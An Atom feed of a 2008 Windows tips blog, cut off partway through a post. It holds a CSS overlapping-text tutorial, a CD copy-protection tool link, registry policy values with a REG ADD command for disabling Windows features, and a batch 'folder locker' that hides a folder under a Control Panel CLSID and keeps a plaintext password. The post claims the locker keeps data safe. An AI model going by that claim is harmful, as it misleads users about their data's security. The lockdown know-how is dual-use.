<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/atom10full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:georss="http://www.georss.org/georss"><id>tag:blogger.com,1999:blog-5065270819256037047</id><updated>2010-02-09T13:36:37.916+08:00</updated><title type="text">GoCode[rs]</title><subtitle type="html" /><link rel="http://schemas.google.com/g/2005#feed" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/posts/default" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/" /><link rel="hub" href="http://pubsubhubbub.appspot.com/" /><link rel="next" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default?start-index=26&amp;max-results=25" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email></author><generator version="7.00" uri="http://www.blogger.com">Blogger</generator><openSearch:totalResults>113</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/atom+xml" href="http://feeds.feedburner.com/Gocoders" /><feedburner:info xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" uri="gocoders" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com" /><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-3151281902384403268</id><published>2008-09-22T23:35:00.008+08:00</published><updated>2008-09-23T10:05:51.217+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="tips and trick" /><category scheme="http://www.blogger.com/atom/ns#" term="design" /><title type="text">how2.0 : Creating An Overlapped Text In Your Page</title><content type="html">One of my reader want to know a site that can create a text header that is transparent. However, this is a simple codes that is quite fun to play with. Here, i &amp;nbsp;would like to teach how to create an "Overlapping Text" with simple step and instruction. This "Overlapping Text" can be used as a header in your blog page or either in Myspace or Friendster page. The final result will be something like this :&lt;br /&gt;&lt;br /&gt;&lt;div&gt;&lt;center&gt; &lt;br /&gt;&lt;br /&gt;&lt;div style="font-weight: bold; line-height: 2%; text-align: center;"&gt;&lt;span style="color: #09a9e9; font-family: Arial; font-size: 30px;"&gt;1st Line Text&lt;/span&gt;&lt;br /&gt;&lt;span style="color: black; font-family: Arial; font-size: 20px;"&gt;2nd Line Text&lt;/span&gt;&lt;/div&gt;&lt;/center&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;Copy the codes below:&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;center&gt;&lt;textarea cols="55"  name="readonlycommandfields"  readonly="readonly"  rows="6"&gt;&amp;lt;div style="line-height:10%;&amp;nbsp;text-align:center;&amp;nbsp;font-weight:bold;&amp;nbsp;text-decoration:&amp;nbsp;;&amp;nbsp;font-style:"&amp;gt;&amp;lt;span&amp;nbsp;style="font-size:24px;&amp;nbsp;color:#09a9e9;&amp;nbsp;font-family:Arial"&amp;gt;1st&amp;nbsp;Line&amp;nbsp;Text&amp;lt;/span&amp;gt;&amp;lt;br&amp;nbsp;/&amp;gt;&amp;lt;span&amp;nbsp;style="font-size:14px;&amp;nbsp;color:#000000;&amp;nbsp;font-family:Arial"&amp;gt;2nd&amp;nbsp;Line&amp;nbsp;Text&amp;lt;/span&amp;gt;&amp;lt;/div&amp;gt;&lt;/textarea&gt;&lt;/center&gt;&lt;/div&gt;&lt;br /&gt;Ok. Here comes the explanation and some codes that you can adjust for your own environment is:&lt;br /&gt;&lt;br /&gt;&lt;center&gt; &lt;br /&gt;&lt;table border="1" bordercolor="#FFFFFF" style="width: 392px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;&lt;div align="center"&gt;&lt;strong&gt;Value&lt;/strong&gt;&lt;/div&gt;&lt;/td&gt;&lt;td&gt;&lt;div align="center"&gt;&lt;strong&gt;Description&lt;/strong&gt;&lt;/div&gt;&lt;/td&gt;&lt;td&gt;&lt;div align="center"&gt;&lt;strong&gt;Example&lt;/strong&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td width="96"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;line-height:80%&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td width="117"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;Line-height" is the value where your 1st &amp;amp; 2nd text is overlapped. Here you can adjust the % value on your own&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td width="165"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;0% - 100% [smaller value means the more the text overlapped]&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;text-align:center&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;the text alignment &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;center, left, right&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;font-weight:bold&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;Either the font is bold, it must be set to "bold" or empty for normal&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;bold&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;text-decoration: underline&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;Additional decoration over the text&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;underline / overline &lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;font-style: italic&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;The style should be set under "italic" or none&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;italic&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;font-size:24px&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;size under pixel count&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;24px, 15px &amp;amp; so on&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td height="114"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;color:#172ae3&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;The color can be set using rgb format or color codes format&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;1. [color codes format #fffff, #e8f610]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;2. [rgb format : writen as :rgb(53,221,179) where the numbers indicates red, green &amp;amp; blue channel composition]&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;font-family:Arial&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;Font face for the text&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;comic sans, verdana, arial&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;1st Line Text&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;For your 1st text&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;welcome&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;2nd Line Text&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;For your 1st text&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;td&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-style: italic;"&gt;to my world&lt;/span&gt;&lt;/span&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/center&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;update&lt;/span&gt; : to change the text into picture such as a question in the below comment, the situation given is the picture will replace the "1st line text". That means, the picture will be at the bottom layer. So, simply remove the codes after "&amp;lt; span" and change it to "&amp;lt; span &amp;gt;" only. Followed by&amp;nbsp;&amp;lt; img&amp;nbsp;src="http://www.imghosting.com/yourpicture.png"&amp;gt; and continue closed by &amp;lt; /span &amp;gt;.&lt;br /&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-weight: bold;"&gt;eg&lt;/span&gt; :&amp;nbsp;&lt;span class="Apple-style-span" style="font-style: italic;"&gt;..... ;&amp;nbsp;font-style:" &amp;gt;&amp;lt; span &amp;gt;&amp;lt; img&amp;nbsp;src="http://i528.photobucket.com/albums/dd325/zxara_project/ads_default.png"/ &amp;gt;&amp;lt; /span &amp;gt;&amp;lt; br/ &amp;gt;&amp;lt; span&amp;nbsp;style=....&lt;/span&gt;&lt;br /&gt;&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre-wrap;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;hope this&amp;nbsp;help&amp;nbsp;:) F&lt;span class="Apple-style-span" style="font-family: 'Lucida Grande'; font-size: 11px; white-space: pre-wrap;"&gt;&lt;span class="Apple-style-span" style="font-family: 'Times New Roman'; font-size: 16px; white-space: normal;"&gt;eel free to comment. If you find this tutorial didn't help, request me a little further info about this tutorial :)&lt;/span&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-3151281902384403268?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/3151281902384403268/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-creating-overlapped-text-in-your.html#comment-form" title="8 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/3151281902384403268" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/3151281902384403268" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-creating-overlapped-text-in-your.html" title="how2.0 : Creating An Overlapped Text In Your Page" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">8</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-9116951827160886891</id><published>2008-09-19T15:28:00.002+08:00</published><updated>2008-09-20T06:55:26.449+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="password" /><category scheme="http://www.blogger.com/atom/ns#" term="protect CD" /><title type="text">Solution : Covering Your Data in CD From Being Copied</title><content type="html">Since my reader want to know how to protecting her data from being copied, there is several type of solution. So, now i would like to review a little bit about an application called CDSHiELD that can protect your data [in your cd] from being copied. Ok, you can download this application [&lt;a href="http://uploads.bizhat.com/file/333803"&gt;here&lt;/a&gt;].&lt;br /&gt;&lt;br /&gt;It's features comes with:&lt;br /&gt;&lt;ol&gt;&lt;li&gt;CD-Protection + Encryption Set&lt;br /&gt;&lt;/li&gt;&lt;li&gt;CD-Key Request + Encryption&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Message Error Set&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Stealth Mode&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Anti-Ripping Protection&lt;/li&gt;&lt;/ol&gt;If you find this info didn't help, you can just drop by this site [&lt;a href="http://cdmediaworld.com/hardware/cdrom/cd_utils_3.shtml"&gt;here&lt;/a&gt;] to find another several info about protecting your data CD from being copied :)&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-9116951827160886891?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/9116951827160886891/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/solution-covering-your-data-in-cd-from.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/9116951827160886891" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/9116951827160886891" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/solution-covering-your-data-in-cd-from.html" title="Solution : Covering Your Data in CD From Being Copied" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-4982280873639564559</id><published>2008-09-16T05:55:00.007+08:00</published><updated>2008-09-18T05:25:12.144+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="regedit" /><category scheme="http://www.blogger.com/atom/ns#" term="registry" /><category scheme="http://www.blogger.com/atom/ns#" term="hack" /><title type="text">how2.0 : Change/Add Restrictions And Features [a further info about registry tweak &amp; hack]</title><content type="html">If you want to make restrictions to what users can do, you can edit the Registry. You can add and delete Windows features in this key shown below.&lt;br /&gt;&lt;br /&gt;Certain things you must know about registry editor:&lt;br /&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;It's very sensitive. Make sure you change anything inside it if you didn't know about it&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Boolean is where elements or "bits" each contain only two possible values, called various names [eg : yes@no, true@false , 1@2]&lt;br /&gt;&lt;/li&gt;&lt;li&gt;The Boolean number "0" is for ON&lt;br /&gt;&lt;/li&gt;&lt;li&gt;The Boolean number "1" is for OFF&lt;br /&gt;&lt;/li&gt;&lt;li&gt;[eg : To make a printer undeleteable set "NoDeletePrinter" boolean to 1. That The value "NoDeletePrinter" will be activated]&amp;nbsp;&lt;/li&gt;&lt;/ol&gt;Open RegEdit [start &amp;gt; run &amp;gt; "regedit"] and navigate to :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;Under "Explorer" subkey, this "DWORD" value can be created :&lt;br /&gt;&lt;ol&gt;&lt;li&gt;NoDeletePrinter : Disables Deletion of Printers&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoAddPrinter : Disables Addition of Printers&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoRun : Disables Run Command&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoSetFolders : Removes Folders from Settings on Start Menu&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoSetTaskbar : Removes Taskbar from Settings on Start Menu&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoFind : Removes the Find Command&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoDrives : Hides Drives in My Computers&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoNetHood : Hides the Network Neighborhood&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoDesktop : Hides all icons on the Desktop&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoLogoff : Hides the Log Off in the Start Menu&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoRecentDocsMenu : Hides the Documents shortcut at the Start button&lt;br /&gt;&lt;/li&gt;&lt;li&gt;DisableRegistryTools : Disable Registry Editing Tools&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoChangeStartMenu : Disables changes to the Start Menu&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoFileMenu : Hides the Files Menu in Explorer&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoActiveDesktop : No Active Desktop&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoFolderOptions : Hides the Folder Options in the Explorer&lt;br /&gt;&lt;/li&gt;&lt;li&gt;ClearRecentDocsOnExit : Empty the recent Docs folder on reboot&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoActiveDesktopChanges : No changes allowed&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoInternetIcon : No Internet Explorer Icon on the Desktop&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoFavoritesMenu : Hides the Favorites menu&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoClose : Disables Shutdown&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoRecentDocsHistory: Clears history of Documents&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoSaveSettings : Don't save settings on exit&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoControlPanel :Hide the control panel visibility&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoCDBurning : Disable Cd burning&lt;/li&gt;&lt;/ol&gt;Under " System" subkey, this "DWORD" value can be created :&lt;br /&gt;&lt;ol&gt;&lt;li&gt;NoDispCPL : Disable Display Control Panel&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoPwdPage : Hide Password Change Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoDispScrSavPage : Hide Screen Saver Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoDispBackgroundPage : Hide Background Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoSecCPL : Disable Password Control Panel&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoDispAppearancePage : Hide Appearance Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoDispSettingsPage : Hide Settings Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoDevMgrPage : Hide Device Manager Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoConfigPage : Hide Hardware Profiles Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoVirtMemPage : Hide Virtual Memory Button&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoAdminPage : Hide Remote Administration Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoProfilePage : Hide User Profiles Page&lt;br /&gt;&lt;/li&gt;&lt;li&gt;NoFileSysPage : Hide File System Button&amp;nbsp;&lt;/li&gt;&lt;/ol&gt;&lt;br /&gt;Alternatively, if you want to create a string or edit it without opening Registry Editor, you can just fire up these string in the "run box" :&lt;br /&gt;&lt;blockquote&gt;&lt;blockquote&gt;REG add&amp;nbsp;HKCU\Software\Microsoft\Windows\CurrentVersion\&lt;br /&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;blockquote&gt;Policies\Explorer&amp;nbsp;/v&amp;nbsp;DisableRegistryTools&amp;nbsp;/t&amp;nbsp;REG_DWORD&amp;nbsp;/d&amp;nbsp;0&amp;nbsp;/f&lt;br /&gt;&lt;/blockquote&gt;&lt;/blockquote&gt;This can be more easier for you to add or change the value in the Registry Editor. In a long explanation :&lt;br /&gt;&lt;ul&gt;&lt;li&gt;REG ADD : adding a registry value&lt;br /&gt;&lt;/li&gt;&lt;li&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer : It will navigate through this value&lt;br /&gt;&lt;/li&gt;&lt;li&gt;/v DisableRegistryTools : It will create a value named "DisableRegistryTool". This can be change to your desired value that you want to create.&lt;br /&gt;&lt;/li&gt;&lt;li&gt;/t REG_DWORD : And the value created is a "DWORD" value type&lt;br /&gt;&lt;/li&gt;&lt;li&gt;0 : The boolean is set to "0" [off]. "1" = [on]&lt;br /&gt;&lt;/li&gt;&lt;li&gt;/f : The data will be force&amp;nbsp;overwritten&amp;nbsp;without any prompt&lt;/li&gt;&lt;/ul&gt;That's all for this tutorial. FYI, registry editor have a great deal in controlling your system. So, please make sure that you know what yo want to do before tweaking it. I'll post some thing more interesting about this "regedit" later. You can also &lt;a href="http://sukiprattle.blogspot.com/2008/07/show-hidden-files-and-task-manager.html"&gt;find how to show hidden files and task manager using "Group Policy Editor" and "Regedit" briefly&lt;/a&gt; by reading my buddy&amp;nbsp;explanation.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5065270819256037047-4982280873639564559?l=gocoders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://gocoders.blogspot.com/feeds/4982280873639564559/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-changeadd-restrictions-and.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4982280873639564559" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/5065270819256037047/posts/default/4982280873639564559" /><link rel="alternate" type="text/html" href="http://gocoders.blogspot.com/2008/09/how20-changeadd-restrictions-and.html" title="how2.0 : Change/Add Restrictions And Features [a further info about registry tweak &amp; hack]" /><author><name>zenal @ zxara</name><uri>http://www.blogger.com/profile/13183076454760333458</uri><email>zxara_project@yahoo.com</email><gd:extendedProperty xmlns:gd="http://schemas.google.com/g/2005" name="OpenSocialUserId" value="14354701094863265331" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5065270819256037047.post-6435196300837236360</id><published>2008-09-15T12:54:00.011+08:00</published><updated>2008-09-15T16:33:11.863+08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="how2.0" /><category scheme="http://www.blogger.com/atom/ns#" term="password" /><category scheme="http://www.blogger.com/atom/ns#" term="programming" /><title type="text">how2.0 : Create Your Own Password Protected Folder</title><content type="html">Ever had a situation where you want to keep your file secretly. Avoid others from accessing your private data by your own application! Write the codes by yourself. In today how2.0 tutorial, i'll teach you a simple batch [*.bat] file programming, using only your notepad. This program runs under command prompt "CMD". Maybe it's too advance to learn this before you know about the basic of batch [*.bat] file itself. But nevermind, i'll explain the codes for your understanding. Yeah, lets rock the codes!!&amp;nbsp;Here it is :&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 1&lt;/span&gt;&lt;br /&gt;Firstly, i'll explain about the method used in this batch [*.bat] program. &lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;1st method :&lt;/span&gt;&lt;br /&gt;Here, we'll use an unique method to create a folder that seen as "control panel". Magic? Yeah. This unique  string : Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D} ,represent as "control panel" folder. So, if you rename any folder using this string, it will become a "control panel" but actually that is your folder. The is many more unique string such as:&lt;br /&gt;&lt;ul&gt;&lt;li&gt;Internet Explorer.{FBF23B42-E3F0-101B-8488-00AA003E56F8}&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}&lt;br /&gt;&lt;/li&gt;&lt;li&gt;My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}&lt;br /&gt;&lt;/li&gt;&lt;li&gt;My Documents.{ECF03A32-103D-11d2-854D-006008059367}&lt;br /&gt;&lt;/li&gt;&lt;li&gt;Fonts.{BD84B380-8CA2-1069-AB1D-08000948F534}&lt;/li&gt;&lt;/ul&gt;You can change the middle string such as, "MyOwnFolder.{21EC2020-3AEA-1069-A2DD-08002B30309D}". The folder will appear as "control panel" icon, named "MyOwnFolder", but you will also redirected to control panel folder. Thats means, your folder cannot be accessed as usual. The data inside the folder will remain safety.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;2nd method :&lt;/span&gt;&lt;br /&gt;We'll change the folder attributes to "system files attribute" and "hidden files attribute" by using "attrib" method that i've explain in my last post. [attrib x:/filename +s +h]&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;Step 2&lt;/span&gt;&lt;br /&gt;Copy &amp;amp; Paste these codes into your notepad [start &amp;gt; run &amp;gt; "notepad"]. These codes combine the two method i've mention above to secure your folder.&lt;br /&gt;&lt;br /&gt;cls&lt;br /&gt;@ECHO OFF&lt;br /&gt;title Folder Passworder [Beta Test] by zXara &lt;br /&gt;if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK&lt;br /&gt;if NOT EXIST Locker goto MDLOCKER&lt;br /&gt;:CONFIRM&lt;br /&gt;echo Are you sure u want to Lock the folder(Y/N)&lt;br /&gt;set/p "cho=&amp;gt;"&lt;br /&gt;if %cho%==Y goto LOCK&lt;br /&gt;if %cho%==y goto LOCK&lt;br /&gt;if %cho%==n goto END&lt;br /&gt;if %cho%==N goto END&lt;br /&gt;echo Invalid choice.&lt;br /&gt;goto CONFIRM&lt;br /&gt;:LOCK&lt;br /&gt;ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;br /&gt;attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;br /&gt;echo Folder locked&lt;br /&gt;goto End&lt;br /&gt;:UNLOCK&lt;br /&gt;echo Enter password to Unlock folder&lt;br /&gt;set/p "pass=&amp;gt;"&lt;br /&gt;if NOT %pass%== password goto FAIL&lt;br /&gt;attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;br /&gt;ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker&lt;br /&gt;echo Folder Unlocked successfully&lt;br /&gt;goto End&lt;br /&gt;:FAIL&lt;br /&gt;echo Invalid password&lt;br /&gt;goto end&lt;br /&gt;:MDLOCKER&lt;br /&gt;md Locker&lt;br /&gt;echo Locker created successfully&lt;br /&gt;goto End&lt;br /&gt;:End&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic;"&gt;&lt;span style="font-weight: bold;"&gt;[explanation]&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;ol&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;@ECHO OFF &amp;lt;&amp;lt;- the programs header&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;title Folder Passworder [Beta Test] by zXara &amp;nbsp;&amp;lt;&amp;lt;- your program title&lt;br /&gt;&lt;/span&gt; &lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span style="font-style: italic;"&gt;&lt;span class="Apple-style-span" style="font-size: small;"&gt;if EXIST "Control 